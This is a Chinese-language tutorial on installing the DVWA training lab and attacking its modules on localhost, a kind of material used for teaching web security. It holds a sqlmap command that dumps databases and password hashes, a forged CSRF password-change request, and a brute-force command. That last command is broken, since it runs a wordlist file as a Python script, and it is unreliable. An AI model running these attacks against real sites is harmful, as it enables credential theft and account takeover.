一、DVWA安裝教程
1、首先下載DVWA壓縮包,解壓到Web伺服器的www目錄下;
cd /var/www/ wget https://github.com/ethicalhack3r/DVWA/archive/master.zip unzip master.zip mv DVWA-master dvwa cd dvwa cp config/config.inc.php.dist config/config.inc.php
2、修改配置文件中的相關設置;
vim config/config.inc.php
3、在瀏覽器中訪問localhost/dvwa/setup.php,進行DVWA的設置
二、DVWA通關
1、注入攻擊:打開DVWA的SQL Injection模塊,使用工具進行注入攻擊,獲得管理員許可權。
sqlmap -u "localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p id --level=5 --risk=3 --dbms=mysql --os=linux --current-db --current-user --passwords --dump
2、XSS攻擊:打開DVWA的XSS Reflected模塊,嘗試在輸入框輸入JavaScript代碼,以達到攻擊效果。
3、CSRF攻擊:使用BurpSuite進行攻擊,構造Post請求,模擬受害者在攻擊網站中執行此請求,達到攻擊效果。
POST /dvwa/vulnerabilities/csrf/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 49 Origin: http://localhost Connection: close Referer: http://localhost/dvwa/vulnerabilities/csrf/ security=low&form=submit&password_new=test&password_conf=test
三、DVWA全級別教程
1、低安全性:完成注入攻擊,獲取管理員許可權。
2、中等安全性:嘗試注入攻擊失敗,需要使用布爾盲注等更高級的攻擊方式。
3、高安全性:禁用一些常用的攻擊方式,需要使用更加高級的攻擊方式在系統中進行攻擊。
四、DVWA搭建教程
在本地或者雲伺服器上安裝Web伺服器,按照上述方法安裝DVWA,即可進行DVWA靶場的搭建。
五、DVWA靶場過關教程
根據DVWA的說明文檔,逐個完成相關模塊的攻擊過關。
六、DVWA教程
通過DVWA,了解如何攻擊和防禦Web系統常見的漏洞,提升攻防水平。
七、DVWA暴力破解教程
使用工具進行暴力破解,例如使用BurpSuite,構造額外有指定字典和延遲時間的暴力破解請求:
python3 /root/tools/Seclists/Passwords/darkweb2017-top10000.txt /root/tools/Seclists/Passwords/darkweb2017-top10000.txt 4 'http://localhost:80/dvwa/vulnerabilities/brute/?username=admin&password=FUZZ&Login=Login&user_token=717bfe2f186df7252886661a62ab8cc2' brute-force
原創文章,作者:小藍,如若轉載,請註明出處:https://www.506064.com/zh-tw/n/295577.html
微信掃一掃 
支付寶掃一掃 